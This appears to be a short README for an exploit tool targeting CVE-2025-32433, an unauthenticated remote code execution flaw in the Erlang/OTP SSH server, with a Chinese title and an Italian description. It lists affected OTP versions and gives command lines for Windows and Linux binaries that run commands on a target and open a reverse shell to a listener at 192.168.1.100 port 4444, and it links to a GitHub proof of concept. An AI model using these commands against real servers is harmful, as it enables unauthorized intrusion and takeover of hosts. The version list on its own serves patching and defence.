
CVE-2025-32433 Erlang/OTP SSH RCE Exploit SSH远程代码执行漏洞EXP
È stata identificata una grave vulnerabilità nel server SSH Erlang/OTP che potrebbe consentire a un attaccante di eseguire codice in remoto (RCE) senza autenticazione. Sfruttando un difetto nella gestione dei messaggi del protocollo SSH, un malintenzionato potrebbe ottenere accesso non autorizzato ai sistemi interessati ed eseguire comandi arbitrari senza credenziali valide. Ciò potrebbe portare al compromesso di tali host, consentendo l'accesso non autorizzato e la manipolazione di dati sensibili da parte di terzi, o attacchi denial-of-service.
OTP-27.3.2 e precedenti
OTP-26.2.5.10 e precedenti
OTP-25.3.2.19 e precedenti
cve-2025-32433.exe 127.0.0.1 -c 'id'
./cve-2025-32433.lnx 127.0.0.1 -c 'id'
cve-2025-32433.exe 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
./cve-2025-32433.lnx 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

https://github.com/omer-efe-curkus/CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC